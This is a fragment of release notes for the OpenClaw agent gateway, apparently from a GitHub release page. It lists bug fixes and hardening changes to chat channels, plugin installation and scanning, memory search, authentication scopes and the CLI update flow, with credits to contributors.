<li>Browser: enforce strict SSRF current-URL checks before existing-session screenshots, matching existing-session snapshot handling. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Active Memory: give timeout partial transcript recovery enough abort-settle headroom so temporary recall summaries are returned before cleanup. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/chat: clear the active reply-run guard before draining queued same-session follow-up turns, so sequential <code>chat.send</code> calls no longer trip <code>ReplyRunAlreadyActiveError</code> every other request. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379026753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77485" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77485/hovercard" href="https://github.com/openclaw/openclaw/issues/77485">#77485</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bws14email/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bws14email">@bws14email</a>.</li>
<li>Agents/media: avoid sending generated image, video, and music attachments twice when streamed reply text arrives before the final <code>MEDIA:</code> directive.</li>
<li>CLI/sessions: cap <code>openclaw sessions</code> output to the newest 100 rows by default and add <code>--limit &lt;n|all&gt;</code> plus JSON pagination metadata, so repeated machine polling of large session stores cannot fan out into unbounded per-row enrichment/output work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379239968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77500" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77500/hovercard" href="https://github.com/openclaw/openclaw/issues/77500">#77500</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kaotic3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kaotic3">@Kaotic3</a>.</li>
<li>Doctor/config: restore legacy group chat config migrations for <code>routing.allowFrom</code>, <code>routing.groupChat.*</code>, and <code>channels.telegram.requireMention</code> so upgrades keep WhatsApp, Telegram, and iMessage group mention gates and history settings instead of leaving configs invalid or silently blocked. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scoootscooob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scoootscooob">@scoootscooob</a>.</li>
<li>CLI/update: make package-update follow-up processes write completion results and exit explicitly, so Windows packaged upgrades do not hang after the new package finishes post-core plugin work. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Release validation: skip Slack live QA unless Slack credentials are explicitly configured, so release gates can keep proving non-Slack surfaces while Slack is still local and credential-gated. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/update: treat OpenClaw CalVer correction versions like <code>2026.5.3-1</code> as satisfying base plugin API ranges, so correction builds can install plugins that require the base runtime API. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4376348978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77293" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77293/hovercard" href="https://github.com/openclaw/openclaw/issues/77293">#77293</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378597699" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77450" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77450/hovercard" href="https://github.com/openclaw/openclaw/pull/77450">#77450</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>.</li>
<li>Discord/Gateway startup: retry Discord READY waits with backoff, defer startup <code>sessions.list</code> and native approval readiness failures until sidecars recover, and preserve component-only Discord payloads when final reply scrubbing removes all text. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378961577" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77478" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77478/hovercard" href="https://github.com/openclaw/openclaw/pull/77478">#77478</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NikolaFC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NikolaFC">@NikolaFC</a>.</li>
<li>CLI/launcher: forward termination signals to compile-cache respawn children, so killing a wrapper process no longer leaves the security audit worker orphaned. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378715767" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77458/hovercard" href="https://github.com/openclaw/openclaw/issues/77458">#77458</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jaikharbanda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jaikharbanda">@jaikharbanda</a>.</li>
<li>Plugins/registry: recover managed-npm external plugins from the owned npm root when a stale persisted registry would otherwise hide them after package-manager upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4376104443" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77266" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77266/hovercard" href="https://github.com/openclaw/openclaw/issues/77266">#77266</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>.</li>
<li>fix(gateway): clamp unbound websocket auth scopes [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378170535" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77413" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77413/hovercard" href="https://github.com/openclaw/openclaw/pull/77413">#77413</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Gate zalouser startup name matching [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378152152" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77411" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77411/hovercard" href="https://github.com/openclaw/openclaw/pull/77411">#77411</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Active Memory: send a bounded latest-message search query to the recall worker so channel/runtime metadata does not become the memory search string. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4247741968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65309/hovercard" href="https://github.com/openclaw/openclaw/issues/65309">#65309</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeykrug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeykrug">@joeykrug</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/westley3601/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/westley3601">@westley3601</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pimenov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pimenov">@pimenov</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tasi333/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tasi333">@tasi333</a>.</li>
<li>fix(device-pair): require pairing scope for pair command [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370614193" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76377" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76377/hovercard" href="https://github.com/openclaw/openclaw/pull/76377">#76377</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Providers/OpenRouter: keep DeepSeek V4 <code>reasoning_effort</code> on OpenRouter-supported values, mapping stale <code>max</code> thinking overrides to <code>xhigh</code> so <code>openrouter/deepseek/deepseek-v4-pro</code> no longer fails with OpenRouter's invalid-effort 400. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4377137286" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77350" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77350/hovercard" href="https://github.com/openclaw/openclaw/issues/77350">#77350</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378204338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77423" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77423/hovercard" href="https://github.com/openclaw/openclaw/pull/77423">#77423</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/krllagent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/krllagent">@krllagent</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mushuiyu886/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mushuiyu886">@mushuiyu886</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</li>
<li>fix(qqbot): keep private commands off framework surface [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4375172453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77212" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77212/hovercard" href="https://github.com/openclaw/openclaw/pull/77212">#77212</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Claude CLI: honor non-off <code>/think</code> levels by passing Claude Code's session-scoped <code>--effort</code> flag through the CLI backend seam, so chat bridges no longer show an inert thinking control. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4376451827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77303" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77303/hovercard" href="https://github.com/openclaw/openclaw/issues/77303">#77303</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Petr1t/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Petr1t">@Petr1t</a>.</li>
<li>Agents/subagents: refresh deferred final-delivery payloads when same-session completion output changes, so retried parent notifications use the final child summary instead of stale progress text. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/media: route async music and video completion results back through the requester agent, preserving automatic replies while requiring the message tool only for message-tool-only group/channel delivery.</li>
<li>active-memory: skip the memory sub-agent gracefully instead of logging a confusing allowlist error when no memory plugin (<code>memory-core</code> or <code>memory-lancedb</code>) is loaded, so active-memory with no memory backend no longer produces misleading "No callable tools remain" warnings in the gateway log. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379314303" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77506" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77506/hovercard" href="https://github.com/openclaw/openclaw/issues/77506">#77506</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Memory/wiki: preserve representation from both corpora in <code>corpus=all</code> searches while backfilling unused result capacity, so memory hits are not starved by numerically higher wiki integer scores. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4377040368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77337" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77337/hovercard" href="https://github.com/openclaw/openclaw/issues/77337">#77337</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Docker/compose: pin container-side <code>OPENCLAW_CONFIG_DIR</code> and <code>OPENCLAW_WORKSPACE_DIR</code> on both gateway and CLI services so the host paths written into <code>.env</code> by <code>scripts/docker/setup.sh</code> (used as Compose bind-mount sources) cannot leak into runtime code via the <code>env_file</code> import. Fixes regressions on macOS Docker setups where the first agent reply died with <code>EACCES: permission denied, mkdir '/Users'</code> because the host-style workspace path got persisted into <code>agents.defaults.workspace</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378378867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77436" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77436/hovercard" href="https://github.com/openclaw/openclaw/issues/77436">#77436</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lonexreb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lonexreb">@lonexreb</a>.</li>
<li>Telegram: clean up tool-only draft previews after assistant message boundaries so transient <code>Surfacing...</code> tool-status bubbles do not linger when no matching final preview arrives. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Slack: report <code>unknown error</code> instead of <code>undefined</code> in socket-mode startup retry logs and label the retry reason explicitly.</li>
<li>Telegram: let explicit forum-topic <code>requireMention</code> settings override persisted <code>/activate</code> and <code>/deactivate</code> state, so per-topic mention gates work consistently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095745250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49864/hovercard" href="https://github.com/openclaw/openclaw/issues/49864">#49864</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Panniantong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Panniantong">@Panniantong</a>.</li>
<li>Cron: surface failed isolated-run diagnostics in <code>cron show</code>, status, and run history when requested tools are unavailable, so blocked cron runs report the actual tool-policy failure instead of a misleading green result. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365767696" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75763" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75763/hovercard" href="https://github.com/openclaw/openclaw/issues/75763">#75763</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RyanSandoval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RyanSandoval">@RyanSandoval</a>.</li>
<li>TUI/escape abort: track the in-flight runId after <code>chat.send</code> resolves so pressing Esc during the gap before the first gateway event aborts the run instead of repeatedly printing <code>no active run</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3832865940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/1296" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/1296/hovercard" href="https://github.com/openclaw/openclaw/issues/1296">#1296</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lukavyi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lukavyi">@Lukavyi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>TUI/render: stop the long-token sanitizer from injecting literal spaces inside inline code spans, fenced code blocks, table borders, and bare hyphenated/dotted identifiers, so copied package names, entity IDs, and shell line-continuations stay byte-for-byte intact while narrow-terminal protection still chunks unidentifiable long prose tokens. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084135042" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48432" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48432/hovercard" href="https://github.com/openclaw/openclaw/issues/48432">#48432</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040518999" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39505" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39505/hovercard" href="https://github.com/openclaw/openclaw/issues/39505">#39505</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DocOellerson/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DocOellerson">@DocOellerson</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xeusoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xeusoc">@xeusoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CCcassiusdjs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CCcassiusdjs">@CCcassiusdjs</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akramcodez/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akramcodez">@akramcodez</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>Plugin skills: publish plugin-declared skills through the generated plugin skills directory (<code>~/.openclaw/plugin-skills/</code>) while keeping direct prompt loading intact, so agent file-based discovery paths find plugin skill <code>SKILL.md</code> files and inactive plugin links are cleaned up. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4376387154" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77296" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77296/hovercard" href="https://github.com/openclaw/openclaw/issues/77296">#77296</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4376911387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77328" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77328/hovercard" href="https://github.com/openclaw/openclaw/pull/77328">#77328</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>Gateway/status: label Linux managed gateway services as <code>systemd user</code>, making status output explicit about the user-service scope instead of implying a system-level unit. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/install: remove the previous managed plugin directory when a reinstall switches sources, so stale ClawHub and npm copies no longer keep duplicate plugin ids in discovery after the new install wins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/install: let official plugin reinstall recovery repair source-only installed runtime shadows, so <code>openclaw plugins install npm:@openclaw/discord --force</code> can replace the bad package instead of stopping at stale config validation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/update: stage pnpm-detected npm-layout global package updates through a clean npm prefix swap, keep plugin install runtime imports behind a stable alias, and ship legacy install-runtime aliases back to <code>2026.3.22</code>, preventing stale overlay chunks from breaking plugin post-update sync. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/commands: allow the official ClawHub Codex plugin package to keep reserved <code>/codex</code> command ownership, matching the existing npm-managed Codex package behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Auth/OpenAI Codex: rewrite invalidated per-agent Codex auth-order and session profile overrides toward a healthy relogin profile, so revoked OAuth accounts do not stay pinned after signing in again. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Plugins/commands: scope QQBot framework slash commands to the QQBot channel so <code>/bot-*</code> command handlers and native specs do not leak onto unrelated chat surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>fix: harden backend message action gateway routing [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370609226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76374" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76374/hovercard" href="https://github.com/openclaw/openclaw/pull/76374">#76374</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Gate QQBot streaming command auth [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370611629" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76375" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76375/hovercard" href="https://github.com/openclaw/openclaw/pull/76375">#76375</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Plugins/discovery: ignore managed npm plugin packages that only expose TypeScript source entries without compiled runtime output, so stale/broken installs cannot hide a working bundled or reinstallable channel plugin during setup. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/update: treat OpenClaw stable correction versions like <code>2026.5.3-1</code> as newer than their base stable release, so package updates no longer ask for downgrade confirmation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/install: suppress dangerous-pattern scanner warnings for trusted official OpenClaw npm installs, so installing <code>@openclaw/discord</code> no longer prints credential-harvesting warnings for the official package. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/commands: suppress dangerous-pattern scanner warnings for trusted catalog npm installs from owner-gated <code>/plugins install</code> commands, so chat-driven installs match the CLI install trust path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/release: make the published npm runtime verifier reject blank <code>openclaw.runtimeExtensions</code> entries instead of treating them as absent and passing via inferred outputs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/security: ignore inline and block comments when matching source-rule context in plugin install scans, so comment-only <code>fetch</code>/<code>post</code> references near environment defaults do not block clean plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Doctor/plugins: remove stale managed install records for bundled plugins even when the bundled plugin is not explicitly configured, so doctor cleanup cannot leave orphaned install metadata behind. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Web fetch: scope provider fallback cache entries by the selected fetch provider so config reloads cannot reuse another provider's cached fallback payload. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Web search: honor late-bound <code>tools.web.search.enabled: false</code> during tool execution so config reloads cannot leave an already-created <code>web_search</code> tool runnable. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/packages: reject inferred built runtime entries that exist but fail package-boundary checks instead of falling back to TypeScript source for installed packages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/loader: do not retry native-loaded JavaScript plugin modules through the source transformer after native evaluation has already reached a missing dependency, avoiding duplicate top-level side effects. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/packages: reject blank <code>openclaw.runtimeExtensions</code> entries instead of silently ignoring them and falling back to inferred TypeScript runtime entries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Doctor/plugins: remove stale managed npm plugin shadow entries from the managed package lock as well as <code>package.json</code> and <code>node_modules</code>, so future npm operations do not keep referencing repaired bundled-plugin shadows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime state: keep the key being registered when namespace eviction runs in the same millisecond as existing entries, so <code>register</code> and <code>registerIfAbsent</code> do not report success while evicting their own fresh value. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
